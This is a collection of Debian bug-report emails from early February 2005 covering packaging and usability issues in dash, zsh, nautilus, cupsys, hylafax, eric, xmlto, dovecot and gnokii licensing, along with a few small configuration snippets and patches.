Kernel: Linux pleione 2.4.26-grsec #1 Tue Aug 10 15:42:40 CEST 2004 i686
Locale: LANG=en_US, LC_CTYPE=en_US



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293447: dash does not allow function declaration inside conditional statement blocks

2005-02-03 Thread Rens Houben
Package: dash
Version: 0.5.2-1
Severity: important

I've been using dash as sh for quite some time now with no problems at
all, but recently I tried to install the sun-jre package built by
make-jpkg, and the following error resulted:

dpkg: error processing downloads/sun-j2re1.5_1.5.0+update01_i386.deb
(--install):
  subprocess post-installation script returned error exit status 2
/var/lib/dpkg/info/sun-j2re1.5.postinst: 14: Syntax error: "(" unexpected 
(expecting "fi")

The exact same package installed fine on another box, and when I checked
the differences it turned out that on the other machine I hadn't
selected dash to provide /bin/sh. Switching back to bash did indeed fix
the issue, and I was able to install without a hitch.

The part of the postinst script that dash choked on seems to be the
following:

if [ "$1" = configure ]; then
j2se_base="/usr/lib/j2re1.5-sun"
priority=200

< some stuff >  

# alternative 
function program_alternative() {

... Etc. In short, there is a function being declared while it's not out
of the if block yet, and dash doesn't accept that. I've checked with the
POSIX standard and while I don't disgagree that it's risky and sloppy
programming, it's not actually against the standards.



-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.10
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL 
set to en_US.UTF8)

Versions of packages dash depends on:
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an

-- debconf information:
* dash/sh: true


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293439: mantis.postinst failed

2005-02-03 Thread Hilko Bengen
Apparently, bash's line number count is confused by the <

Bug#293448: Imagemagick Grab error: Unable to open image x:

2005-02-03 Thread Gerhard Schneider
Package: imagemagick
Version: 6.0.6.2-2.1

When trying to grab a screen via display we get the error message:
unable to open image '/actual_pathname/x:'

That's new to us. Any ideas?

   Gerhard Schneider

-- 
Gerhard Schneider
Institute of Lightweight Design and  e-Mail:[EMAIL PROTECTED]
Structural Biomechanics (E317)   Tel.:   +43 1 58801 31716
Vienna University of Technology / AustriaFax:+43 1 58801 31799
A-1040 Wien, Gusshausstrasse 27-29http://www.ilsb.tuwien.ac.at/~gs/



signature.asc
Description: This is a digitally signed message part


Bug#293404: zsh: updates breaks tab completion in running zshs

2005-02-03 Thread Goswin von Brederlow
Clint Adams <[EMAIL PROTECTED]> writes:

>> I'm not entirely sure this is zshs fault but whenever I update zsh the
>> tab completion stops working:
>> 
>> [EMAIL PROTECTED]:~% ls 
>> (eval):1: _first: function definition file not found

Ah, so I never used "ls " in that zsh before the update. Very
likely since i tried it on my "watch df" window.

> Anything you've already used should keep working, and there's no good
> way around the others.  It should only happen with upstream version
> changes right now.

Too bad. I guess this becomes a wont-fix bug then.

>> A simple "exec zsh" fixes the problem.
>
> That's what I do.

MfG
Goswin


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#163424: Please do remove the .cvsignore files

2005-02-03 Thread Marcelo E. Magallon
Package: scilab
Version: 3.0-12
Followup-For: Bug #163424

 See subject, there are several .cvsignore files scattered around.

 Marcelo


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#195948: About to upload DSPAM package

2005-02-03 Thread José Luis Tallón
Hi everybody
   Unless somebody says something against this, i am going to upload 
the DSPAM package to unstable (tagged with an RC so it does not migrate 
to testing just yet) so that we can have a broader set of testers.
   I don't really think going through experimental is worth the hassle.

   As always, i am wide open to any suggestions.
   My apologies for taking so much time in giving this package the 
attention it deserves, but i have not been able to spare any time. I 
expect to be able to do this from now.
   However, i expect the group at Alioth to help with this. We will 
hopefully be able to provide automated configuration for most relevant 
MTAs soon... what do you think??

Best regards,
   J.L.

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Bug#293450: RFP: kdebluetooth -- Kdebluetooth is a bluetooth interface por the KDE Desktop Environment

2005-02-03 Thread Rafael Rodríguez
Package: wnpp
Severity: wishlist


* Package name: kdebluetooth
  Version : x.y.z
  Upstream Author : Name <[EMAIL PROTECTED]>
* URL : http://www.example.org/
* License : (GPL, LGPL, BSD, MIT/X, etc.)
  Description : Kdebluetooth is a bluetooth interface por the KDE Desktop 
Environment

(Include the long description here.)

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i586)
Kernel: Linux 2.6.9-ck3
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293449: Bug partman

2005-02-03 Thread Stefan Haberl
Package: installation-reports
Debian-installer-version: 01.02.2005 from 
http://cdimage.debian.org/pub/cdimage-testing/daily/
uname -a: Linux can 2.6.8-2-386 #1 Mon Jan 24 03:01:58 EST 2005 i686 unknown
Date: 03.02.2005
Method: Cdrom Install

Machine: HP Proliant350ML G4
Processor: Dual Xeon 3MHz
Memory: 2GB
Root Device:  SCSI  /dev/cciss/c0d0
Root Size/partition table: not available
Output of lspci and lspci -n: not available
Base System Installation Checklist:
[O] = OK, [E] = Error (please elaborate below), [ ] = didn't try it
Initial boot worked:[O ]
Configure network HW:   [O ]
Config network: [ O]
Detect CD:  [ O]
Load installer modules: [O ]
Detect hard drives: [E ]
Partition hard drives:  [E ]
Create file systems:[E ]
Mount partitions:   [E ]
Install base system:[E ]
Install boot loader:[E ]
Reboot: [E ]
Comments/Problems:
The Module cciss loading successfully but Partman is not able to detect 
the Harddrive. If i choose "back" the installer hangs completely.

Last lines in messages:
File descriptor 3 left open
File descriptor 4 left open
File descriptor 5 left open
File descriptor 6 left open
No matching physical volumes found
File descriptor 3 left open
File descriptor 4 left open
File descriptor 5 left open
File descriptor 6 left open
No volume groups found
Last lines in syslog:
DEBUG: Menu item 'partman' selected
DEBUG: configure partman, status: 2
DEBUG: configure libc6, status: 0
DEBUG: vrtualpackage libc6
DEBUG: configure libparted1.6-0, status: 0
DEBUG: configure harddrive-detection, status: 0

--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]


Bug#293451: nautilus: Domain option missing in "Connect to Server" for Windows share type.

2005-02-03 Thread Joachim Nilsson
Package: nautilus
Version: 2.8.2-2
Severity: normal

This report concerns an inconsistency with the contents of different
dialogs providing basically the same function.

If I enter smb://server/share I get a dialog where I can fill in
username, domain and password.  This works perfectly.

However, if I decide to use the way of "Connect to Server" from the
File menu instead there is no way of providing the domain part and
I cannot connect to the server.

A simple fix, for someone with knowledge of Nautilus internals, would
be to simply add a Domain field to the "Connect to Server" dialog
when "Windows share" type is selected.

The network of servers I connect to all run various versions of
Windows 2k or later.

Thanks
 /Jocke

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-686
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages nautilus depends on:
ii  capplets 1:2.8.1-3   configuration applets for GNOME 2 
ii  desktop-file-utils   0.9-1   Utilities for .desktop files
ii  libart-2.0-2 2.3.16-6Library of functions for 2D graphi
ii  libatk1.0-0  1.8.0-4 The ATK accessibility toolkit
ii  libaudiofile00.2.6-5 Open-source version of SGI's audio
ii  libbonobo2-0 2.8.0-4 Bonobo CORBA interfaces library
ii  libbonoboui2-0   2.8.0-2 The Bonobo UI library
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libeel2-22.8.2-1 Eazel Extensions Library (for GNOM
ii  libesd-alsa0 [libesd0]   0.2.35-2Enlightened Sound Daemon (ALSA) - 
ii  libexif100.6.9-4 The EXIF library allows you to par
ii  libgail-common   1.8.2-1 GNOME Accessibility Implementation
ii  libgail171.8.2-1 GNOME Accessibility Implementation
ii  libgconf2-4  2.8.1-4 GNOME configuration database syste
ii  libglade2-0  1:2.4.1-2   library to load .glade files at ru
ii  libglib2.0-0 2.6.1-3 The GLib library of C routines
ii  libgnome-desktop-2   2.8.1-2 Utility library for loading .deskt
ii  libgnome2-0  2.8.0-6 The GNOME 2 library - runtime file
ii  libgnomecanvas2-02.8.0-1 A powerful object-oriented display
ii  libgnomeui-0 2.8.0-3 The GNOME 2 libraries (User Interf
ii  libgnomevfs2-0   2.8.3-9 The GNOME virtual file-system libr
ii  libgtk2.0-0  2.4.14-2The GTK+ graphical user interface 
ii  libice6  4.3.0.dfsg.1-10 Inter-Client Exchange library
ii  libnautilus2-2   2.8.2-2 libraries for nautilus components 
ii  liborbit21:2.10.2-1.1libraries for ORBit2 - a CORBA ORB
ii  libpango1.0-01.6.0-3 Layout and rendering of internatio
ii  libpopt0 1.7-5   lib for parsing cmdline parameters
ii  librsvg2-2   2.8.1-2 SAX-based renderer library for SVG
ii  libsm6   4.3.0.dfsg.1-10 X Window System Session Management
ii  libstartup-notification0 0.7-1   library for program launch feedbac
ii  libx11-6 4.3.0.dfsg.1-10 X Window System protocol client li
ii  libxml2  2.6.11-5GNOME XML library
ii  nautilus-data2.8.2-2 data files for nautilus
ii  shared-mime-info 0.15-1  FreeDesktop.org shared MIME databa
ii  xlibs4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu
ii  zlib1g   1:1.2.2-3   compression library - runtime

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#288447: libpri1: New upstream release 1.0.3

2005-02-03 Thread Tzafrir Cohen
On Mon, Jan 03, 2005 at 09:22:27PM +0100, Jerome Warnier wrote:
> Please package the version 1.0.3.

Now that we mention it, version 1.0.4 is also availble

> I already did the work (very easy) and put them here:
> http://apt.bxlug.be/sarge/not-debian (binaries)
> http://apt.bxlug.be/sarge/sources (sources)

  deb http://updates.xorcom.com sarge main

for ours.

But all I needed was to apply the diff on the new source and update the
changelog.

-- 
Tzafrir Cohen   icq#16849755  +972-50-7952406
[EMAIL PROTECTED]http://xorcom.com


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293112: on ppc x0rfbserver is linked against libxclass.so.0.6.2 but 0.8.3 is installed

2005-02-03 Thread Steve Langasek
Hi Ola,

> This probably mean that I just have to upload a new version.

Please also remember to change the xclass library package name the next time
its SONAME changes.

Thanks,
-- 
Steve Langasek
postmodern programmer


signature.asc
Description: Digital signature


Bug#293434: cupsys: upgrade breaks at chmod backen dirs.

2005-02-03 Thread Kenshi Muto
Hi,

At Thu, 03 Feb 2005 12:33:36 +0100,
Andreas Rabus wrote:
> Package: cupsys
> Version: 1.1.23-3
> Severity: important
> 
> It an installation or upgrade error. Was esay to fix by hand.
> 
> At the last dist-upgrade cupsys the installer broke with the following errors.
> 
> Setting up cupsys (1.1.23-3) ...
> chmod: cannot access `scsi': No such file or directory
> chmod: cannot access `serial': No such file or directory
> chmod: cannot access `socket': No such file or directory
> chmod: cannot access `usb': No such file or directory

That's too strange.

cupsys 1.1.23-3 has:

drwxr-xr-x root/root 0 2005-01-22 12:37:55 ./usr/lib/cups/backend/
-rwxr-xr-x root/root 19708 2005-01-22 12:37:54 ./usr/lib/cups/backend/ipp
-rwxr-xr-x root/root 15964 2005-01-22 12:37:54 ./usr/lib/cups/backend/lpd
-rwxr-xr-x root/root  8136 2005-01-22 12:37:54 
./usr/lib/cups/backend/parallel
-rwxr-xr-x root/root  5896 2005-01-22 12:37:55 ./usr/lib/cups/backend/scsi
-rwxr-xr-x root/root  8608 2005-01-22 12:37:55 ./usr/lib/cups/backend/serial
-rwxr-xr-x root/root  7740 2005-01-22 12:37:55 ./usr/lib/cups/backend/socket
-rwxr-xr-x root/root 10320 2005-01-22 12:37:55 ./usr/lib/cups/backend/usb

Could you check your environment carefully, such as 100% disk full or
using something special feature (for example SELinux)?

Thanks,
-- 
Kenshi Muto
[EMAIL PROTECTED]


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293216: hylafax-server: problem is change from MIMENCODE=base64-encode to MIMENCODE=mimencode

2005-02-03 Thread Giuseppe Sacco
Il giorno gio, 03-02-2005 alle 13:37 +0100, Bodo Meissner ha scritto:
> Package: hylafax-server
> Version: 1:4.2.1-1
> Followup-For: Bug #293216
> 
> Hello Guiseppe,
> 
> I think I found the problem.
> 
> In version 4.2.0 the file faxrcvd had a line
> MIMENCODE=base64-encode
> In 4.2.1 it has
> MIMENCODE=mimencode

Thanks. I already packaged a new version of hylafax that check for some
fields in setup.cache and update what is wrong. I should upload it
tomorrow morning.

Giuseppe



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293452: /usr/bin/eric3: eric is looking for python in /usr/local/bin

2005-02-03 Thread Andrew Maier
Package: eric
Version: 3.6.1-2
Severity: grave
File: /usr/bin/eric3
Tags: patch
Justification: renders package unusable

I assume it is only a glitch, but it renders the package unusable. eric
tries to look for python in /usr/local/bin and not it /usr/bin.

This patch should fix it:

--- /usr/bin/eric3  2005-02-01 10:53:39.0 +0100
+++ /usr/bin/eric3.patched  2005-02-03 15:41:24.0 +0100
@@ -1,4 +1,4 @@
 #!/bin/sh
 PYTHONPATH=${PYTHONPATH:+$PYTHONPATH:}/usr/share/eric
 export PYTHONPATH
-exec /usr/local/bin/python
/usr/lib/python2.3/site-packages/eric/eric3.py $*
+exec /usr/bin/python /usr/lib/python2.3/site-packages/eric/eric3.py $*


regards,

Andrew


-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.9-am
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages eric depends on:
ii  bicyclerepair 0.9-3  A refactoring tool for python
ii  python2.3.4-5An interactive high-level object-o
ii  python-qt33.13-4 Qt3 bindings for Python (default v
ii  python-qtext  3.13-4 Qt extensions for PyQt (default ve

-- no debconf information
--- /usr/bin/eric3  2005-02-01 10:53:39.0 +0100
+++ /usr/bin/eric3.patched  2005-02-03 15:41:24.0 +0100
@@ -1,4 +1,4 @@
 #!/bin/sh
 PYTHONPATH=${PYTHONPATH:+$PYTHONPATH:}/usr/share/eric
 export PYTHONPATH
-exec /usr/local/bin/python /usr/lib/python2.3/site-packages/eric/eric3.py $*
+exec /usr/bin/python /usr/lib/python2.3/site-packages/eric/eric3.py $*


Bug#290837: module-assistant: Here too

2005-02-03 Thread Filipus Klutiero
Eduard Bloch a écrit :
tags 290837 + moreinfo unreproducible
thanks
#include 
 

I have no idea what you mean by #include 
* Xavier Douville [Wed, Feb 02 2005, 10:40:30PM]:
...
...
 

Something's definitely broken...
   

If you wish to see anything fixed, send some userful info. I do not care
about the fact that it broke on the PC from your sister, from your dog,
from your facitlity manager or whoever. I need to know:
- what exactly have you done? which commands did you use?
Just m-a build nvidia (as explained in the first report).
If you try to
  build before the GET step... though luck
 

I have no idea what's the GET step.
- what happens in the C locale? (do "export LANG=C")
 

What happens above.
- kernel version of the PC where it actually breaks
 

2.6.8 (abinames are in the system information section).
However I just tested on my sister's PC with 2.4.27-1-386 and the same 
thing happens.

- version of the nvidia module involved
 

Friend's laptop has the only ones available, those in Sid (1.0.6629+1). 
My friend installed Sarge on his laptop yesterday, so everything's very 
fresh.

- permissions situation and free disk space issues! This is important,
  I have seen people reporting random crap because they were out of space
 

As I said this happens on two different PCs. Both have large free space. 
Nothing points to a disk space problem.

Regards,
Eduard.
 

Thanks for your reply too.
To Eduards : I'd like to tell you however that I do not entirely 
appreciate your reply, in particular

If you wish to see anything fixed, send some userful info
I'm not sending this report because I want to fix my little problems. I 
worked around the problem and cared enough to warn you that something is 
broken. Nothing in /usr/share/doc/module-assistant mentions how bugs 
should be reported. I am not familiar at all with kernel stuff and admit 
that I may have skipped some obviously needed info (such as nvidia 
version...). Therefore I find it mean to imply that what I sent was 
useless info. I don't care though, this is just to tell you how that 
might be perceived by others. I also understand that you don't care 
about my dog, family and which christmas presents I got. I knew that 
writing the reports and think I did use this information minimally, only 
to name the PCs and underline that I didn't hunt for broken PCs at the 
other end of the World, the broken PCs are the first PCs I tried. Of 
course this is irrelevant if I did something wrong.

Thanks again,
Philippe.



Bug#293442: tetex-base: broken symlink /usr/share/texmf/dvips/base/psfonts.map

2005-02-03 Thread Frank Küster
Julian Gilbey <[EMAIL PROTECTED]> schrieb:

> Package: tetex-base
> Version: 2.0.2c-3
>
> The symlink /usr/share/texmf/dvips/base/psfonts.map ->
> ../config/psfonts.map is broken: it should point to
> /etc/texmf/dvips/base/psfonts.map or
> /etc/texmf/dvips/config/psfonts.map.

Hm, no, in fact it should point to
/var/lib/texmf/dvips/base/psfonts.map. Do the proposed target files both
exist on your system? 

At the moment I don't remember why we kept that symlink at all.

Regards, Frank
-- 
Frank Küster
Inst. f. Biochemie der Univ. Zürich
Debian Developer




Bug#293112: on ppc x0rfbserver is linked against libxclass.so.0.6.2 but 0.8.3 is installed

2005-02-03 Thread Ola Lundqvist
Hello

On Thu, Feb 03, 2005 at 06:20:14AM -0800, Steve Langasek wrote:
> Hi Ola,
> 
> > This probably mean that I just have to upload a new version.
> 
> Please also remember to change the xclass library package name the next time
> its SONAME changes.

Hmm yes... I'm the maintainer of that package too. :)

Regards,

// Ola

> Thanks,
> -- 
> Steve Langasek
> postmodern programmer



-- 
 - Ola Lundqvist ---
/  [EMAIL PROTECTED] Annebergsslingan 37  \
|  [EMAIL PROTECTED] 654 65 KARLSTAD  |
|  +46 (0)54-10 14 30  +46 (0)70-332 1551   |
|  http://www.opal.dhs.org UIN/icq: 4912500 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36  4FE4 18A1 B1CF 0FE5 3DD9 /
 ---


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293454: qjackctl: Display does not resize with font

2005-02-03 Thread Wouter Michiel Koolen-Wijkstra
Package: qjackctl
Version: 0.2.12-1
Severity: minor



The qjackctl display (the black glassy window in the middle of the UI)
does not resize with the font size. The default setting of 12pt shows up 
cluttered and overlapped on my window (135x126 dpi). Resetting it to 10pt does 
work. It seems funny to offer a font selection dialog (specifically for this 
display), when it cannot be properly handled.

Thanks,

Wouter Koolen-Wijkstra

-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (990, 'testing'), (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-2-k7-smp
Locale: LANG=en_US, LC_CTYPE=en_US (charmap=ISO-8859-1)

Versions of packages qjackctl depends on:
ii  libasound2   1.0.8-1 ALSA library
ii  libc62.3.2.ds1-20GNU C Library: Shared libraries an
ii  libgcc1  1:3.4.3-6   GCC support library
ii  libjack0.80.0-0  0.99.0-2JACK Audio Connection Kit (librari
ii  libqt3c102-mt3:3.3.3-8   Qt GUI Library (Threaded runtime v
ii  libstdc++5   1:3.3.5-5   The GNU Standard C++ Library v3
ii  libx11-6 4.3.0.dfsg.1-10 X Window System protocol client li
ii  libxext6 4.3.0.dfsg.1-10 X Window System miscellaneous exte
ii  xlibs4.3.0.dfsg.1-10 X Keyboard Extension (XKB) configu

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293453: xmlto: Fails to copy the finished work, it it's in directories

2005-02-03 Thread Alejandro Exojo
Package: xmlto
Version: 0.0.18-5
Severity: important

Hi.

Trying to convert an XML that outputs the HTML to directories, xmlto
fails to copy the finished work from the /tmp/xmlto.x working
directory, to the one was invoked.

For example, try to convert Dive into Python's sources:
http://diveintopython.org/download/diveintopython-xml-5.4.zip

After all is done, cp doesn't copies anything, because skips
directories:

Writing installing_python/windows.html for section(install.windows)
Writing installing_python/macosx.html for section(install.macosx)
Writing installing_python/macos9.html for section(install.macos9)
[... skipped ...]
cp: omitting directory `appendix'
cp: omitting directory `dynamic_functions'
[ etc. ]

I suppose a cp -r should do the trick, and be OK for the rest.

Feel free to lower the severity, but I considered this bug enough
important, because you can not tell xmlto not to clean the files in
/tmp, so all work is lost (unless you interrupt the process).

Thanks in advance.

-- System Information:
Debian Release: 3.1
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.7-1-386
Locale: [EMAIL PROTECTED], [EMAIL PROTECTED] (charmap=ISO-8859-15)

Versions of packages xmlto depends on:
ii  debianutils 2.11.2   Miscellaneous utilities specific t
ii  docbook-xml 4.3-1.1  standard XML documentation system,
ii  docbook-xsl 1.66.1-1 stylesheets for processing DocBook
ii  libc6   2.3.2.ds1-20 GNU C Library: Shared libraries an
ii  libpaper-utils  1.1.14-3 Library for handling paper charact
ii  libxml2-utils   2.6.11-5 XML utilities
ii  sgml-base   1.26 SGML infrastructure and SGML catal
ii  xsltproc1.1.8-5  XSLT command line processor

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#273361: dovecot-auth hangs with IO leak

2005-02-03 Thread Alan
Package: dovecot
Version: 0.99.13-3
Followup-For: Bug #273361

My /etc/pam.d/common-* looks like this:

account [success=1 default=ignore] pam_unix.so
account required pam_ldap.so use_first_pass
account required pam_permit.so
auth[success=1 default=ignore] pam_unix.so
authrequired pam_ldap.so use_first_pass
authrequired pam_permit.so
session [success=1 default=ignore] pam_unix.so
session required pam_ldap.so use_first_pass
session required pam_mkhomedir.so skel=/etc/skel umask=0002
session required pam_permit.so

When many LDAP users login, /var/log/auth.log shows many (expected) error like:
Feb  3 18:16:15 eta dovecot-auth: (pam_unix) authentication failure; logname= 
uid=0 euid=0 tty= ruser= rhost=127.0.0.1
Feb  3 18:16:19 eta dovecot-auth: (pam_unix) check pass; user unknown

After recent upgrades, these lines begin to appear.
Feb  3 16:31:00 eta dovecot-auth: Login process has too old (123s) requests, 
killing it.
Feb  3 16:31:00 eta dovecot-auth: Login process has too old (124s) requests, 
killing it.

And some more like this:
Feb  3 16:45:23 eta dovecot-auth: I/O leak: 0x8054940 (13)
Feb  3 16:45:23 eta dovecot-auth: I/O leak: 0x8054940 (14)
Feb  3 16:45:23 eta dovecot-auth: I/O leak: 0x8054940 (15)

However, the problem is solved by changing /etc/pam.d/dovecot to:
authrequired pam_ldap.so
account required pam_ldap.so
session required pam_mkhomedir.so skel=/etc/skel umask=0002
session required pam_ldap.so

I think dovecot has some problem dealing with the pam_unix + pam_ldap
configuration. I don't know if it really happens between 0.99.10 to
0.99.11. Shall we report it upstream?


-- System Information:
Debian Release: 3.1
  APT prefers testing
  APT policy: (500, 'testing'), (400, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.8-mppe
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)

Versions of packages dovecot depends on:
ii  dovecot-imapd 0.99.13-3  A secure IMAP server that supports
ii  dovecot-pop3d 0.99.13-3  A secure POP3 server that supports

-- no debconf information


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293435: vserver-debiantools: VREBOOT_LOCATION is set to the old location

2005-02-03 Thread Ola Lundqvist
Hello

On Thu, Feb 03, 2005 at 01:04:37PM +0100, Erik Rossen wrote:
> Package: vserver-debiantools
> Version: 0.1.7
> Severity: normal
> 
> In the scripts /usr/sbin/{newnfserver,newvserver,stripserver}, there is
> the line
> 
> VREBOOT_LOCATION="/usr/lib/vserver/vreboot"
> 
> which was the old locateion of the vreboot utility.
> 
> The package util-vserver now stores vreboot in
> /usr/lib/util-vserver/vreboot, thus the vreboot utility is never copied
> into a freshly-made vserver.

Thanks a lot for the notification. I'll update this asap.

Regards,

// Ola

> -- System Information:
> Debian Release: 3.1
>   APT prefers testing
>   APT policy: (990, 'testing'), (133, 'unstable')
> Architecture: i386 (i686)
> Kernel: Linux 2.4.27prolibre
> Locale: LANG=C, LC_CTYPE=fr_CH (charmap=ISO-8859-1)
> 
> Versions of packages vserver-debiantools depends on:
> ii  binutils  2.15-5 The GNU assembler, linker and 
> bina
> ii  debootstrap   0.2.45 Bootstrap a basic Debian system
> ii  rsync 2.6.3-2fast remote file copy program 
> (lik
> ii  util-vserver  0.30-14tools for Virtual private 
> servers 
> 
> -- no debconf information
> 
> 
> 

-- 
 - Ola Lundqvist ---
/  [EMAIL PROTECTED] Annebergsslingan 37  \
|  [EMAIL PROTECTED] 654 65 KARLSTAD  |
|  +46 (0)54-10 14 30  +46 (0)70-332 1551   |
|  http://www.opal.dhs.org UIN/icq: 4912500 |
\  gpg/f.p.: 7090 A92B 18FE 7994 0C36  4FE4 18A1 B1CF 0FE5 3DD9 /
 ---


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#293183: tetex-extra: spacing of footnotes with hyperref and pdflatex

2005-02-03 Thread Arnaud Giersch
Mercredi le 02 février 2005, vers 12:25:30 (CET), Frank Küster a
écrit:

> if you're still interested in finding the reason for this bug, although
> it's already fixed, here's a better minimal example which doesn't use
> \footnotee. 

Frank,

I tried the latest hyperref found on CTAN (v6.74m) and the problem is
still visible with either my example (with \refstepcounter) or the
original one (with entcs.cls).

I was not able to reproduce the problem with your example on an
up-to-date Sarge system (file versions are the same as yours): cases 1
and 2 look identical with dvi or pdf.

I however did not try to download the full experimental teTeX package
(I do not want to break my current installation).  Can you, please,
try my code with the latest teTeX, and check if the fixed-* tags are
correct, or if they should be removed?

Regards,
-- 
Arnaud



Bug#293455: POV-Ray 3.6 available upstream

2005-02-03 Thread Mark Weyer
Package: povray
Version: 1:3.5
Severity: wishlist

Upstream (http://www.povray.org) has a newer version available.
The new version is 3.6
Debian's highest version seems to be 3.5

Regards,

  Mark Weyer



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Bug#266566: Status of gnokii-licence-violation problem

2005-02-03 Thread Jonas Smedegaard
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 03-02-2005 13:57, Holger Levsen wrote:
> Hi,
> 
> I just subscribed to this list, read the archives from last summer, esp. 
> http://albatross.madduck.net/pipermail/gammu-legal/2004-October/000112.html 
> and would like to hear your comments regarding the solution of 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=266566.
> 
> If I understood the patches from October correctly, the bug fix is there and 
> "only" has to be applied to the debian packages ? 

Only the authors of Gnokii can solve legal issues of their own software.
The patch at gammu-legal is a _proposal_ made by the person unhappy with
Gnokii and not (anymore) part of Gnokii. Upstream may choose to adopt
that proposed patch, but from the thread of the bugreport it seems they
acknowledge the problem (at least as a possibility) but choose to solve
it differently.

Debian cannot "solve" this issue by patching copyright and/or licensing
notes of the upstream software. Only possible fixes is the following (as
I see it):

 * Remove gnokii from the archive
 * Wait for fix provided by upstream
 * Consider this a non-bug and simply close this bugreport.


> Hach, is life easy if you only have to quote three URLs to convey your 
> message :-)

Indeed :-)


 - Jonas


P.S.

The very reason Gnokii can solve the issue differently than has been
judged the only solution technically possible for a similar issue of the
competing program Gammu is their use of a version control system.

- --
* Jonas Smedegaard - idealist og Internet-arkitekt
* Tlf.: +45 40843136  Website: http://dr.jones.dk/

 - Enden er nær: http://www.shibumi.org/eoti.htm
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.5 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFCAj5kn7DbMsAkQLgRAmUXAJ902rup8JyzalTlltwYkH84Y/FQNwCgg5pa
R7YHlsaB6Dnft95YKlV/rBM=
=PKmR
-END PGP SIGNATURE-



Bug#266566: Status of gnokii-licence-violation problem

2005-02-03 Thread Michal ÄihaÅ
Hi

On Thu 3. 2. 2005 13:57, Holger Levsen wrote:
> I just subscribed to this list, read the archives from last summer, esp. 
> http://albatross.madduck.net/pipermail/gammu-legal/2004-October/000112.html 

This is patch for gammu and it is already applied in gammu.

> and would like to hear your comments regarding the solution of 
> http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=266566.

This bug is about gnokii.

> If I understood the patches from October correctly, the bug fix is there and 
> "only" has to be applied to the debian packages ? 
> 
> My main motivation is http://bjorn.haxx.se/debian/testing.pl?package=kdepim

Kdepim depends on gnokii.

> Hach, is life easy if you only have to quote three URLs to convey your 
> message :-)

You should write to gnokii mailing list, I doubt anybody here follows gnokii 
development such detailly to know whether there was such change.

-- 
Michal ÄihaÅ | http://www.cihar.com


pgpEgCAdgMTPQ.pgp
Description: PGP signature


Bug#271262: The same on ppc with fvwm2

2005-02-03 Thread Helge Kreutzmann
Hello,
On Thu, Feb 03, 2005 at 11:41:43AM +1100, Ben Burton wrote:
> > I run fvwm2 on ppc and also no window is presented. I run kteatime
> > under strace, and whenever I changed windows with the mouse, a few,
> > very similar lines were repeated. If you are interested, I can present
